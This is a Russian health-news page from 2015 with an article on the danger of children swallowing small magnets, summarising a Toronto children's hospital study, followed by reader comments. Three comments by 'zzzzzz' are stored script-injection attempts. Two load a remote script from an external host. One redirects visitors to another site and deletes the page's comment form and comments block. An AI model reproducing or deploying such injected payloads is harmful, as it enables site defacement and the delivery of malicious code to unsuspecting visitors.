Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Магниты убивают детей! Ка...  >>  Магниты убивают детей! Как их защитить?
 
Обратная связь
 

Магниты убивают детей! Как их защитить?

Размер шрифта
19 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

За последние годы было разработано множество новых игрушек, в том числе и тех, что работают благодаря магнитам. Где же подвох?

Врачи всерьез обеспокоены тем, что в последнее время участились случаи проглатывания магнитов. Попадание магнитов в кишечник может привести к тяжелым травмам и даже смерти ребенка. Специалисты считают, что предупреждающих надписей на упаковках игрушек уже недостаточно – нужно искать новые способы объяснить родителям и детям, что с магнитами стоит обращаться осторожно.

Исследование этого вопроса было проведено в крупнейшей детской больнице Канады, расположенной в Торонто. Ученые проанализировали более 2 700 случаев обращения в скорую помощь по поводу проглатывания ребенком инородных тел. «Большинство серьезных повреждений связано именно с проглатыванием магнитов: в основном это травмы и разрывы стенок желудка, тонкой и толстой кишки», – рассказывает доктор Мэтт Стриклэнд, ведущий автор исследования. Его результаты были опубликованы в The Journal of Pediatrics.

Все дело в том, что если ребенок проглатывает 2 маленьких магнита, то они притягиваются друг к другу в кишечнике, зажимая между собой кишечник. Из-за постоянного давления в нем образуются язва, которая приведет к выходу содержимого в брюшную полость и перитониту!

У 94 детей в желудочно-кишечном тракте были обнаружены магниты, причем 30 из них проглотили сразу несколько штук. Ученые установили, что количество таких случаев утроилось после 2009 года, когда в продажу поступили игрушки, состоящие из маленьких магнитных шариков. Более того, после 2009 года количество травм, нанесенных сразу несколькими проглоченными магнитами, увеличилось примерно в 9 раз. Шести детям пришлось провести экстренную операцию из-за развития инфекции, сепсиса и разрыва кишечника. Все шесть случаев произошли после 2009 года. «Нас очень беспокоит эта тенденция – увеличение количества травм, вызванных проглатыванием сразу нескольких небольших магнитов», – отмечает Стриклэнд. 

Обязательно следите за тем, с чем играет ваш ребенок, ведь даже маленький магнитный шарик может привести к очень серьезным травмам.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

19 февраля 2015 в 10:13

Цитировать   |   Пожаловаться

)))) и где это дети находят магнитные шарики?
Единственные магниты, что есть у человека в доме, магниты на холодильник.
С трудом представляю себе, как ребёнок может проглотить рыбку с холодильника. 

2 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что можно узнать о жизни ребенка в социальных сетях   Арт-парад Елки-2015: приносим праздник в детские больницы   Родители стали хуже после падения Берлинской стены!   Тайные опасности для ребенка дома  
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 23 сентября 2011Физкультура до добра не доводит?
 

Слайдшоу

1
Первые шаги вашего малыша
Как устроить дом, чтобы не убить ребенка
Как устроить дом, чтобы не убить ребенка

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.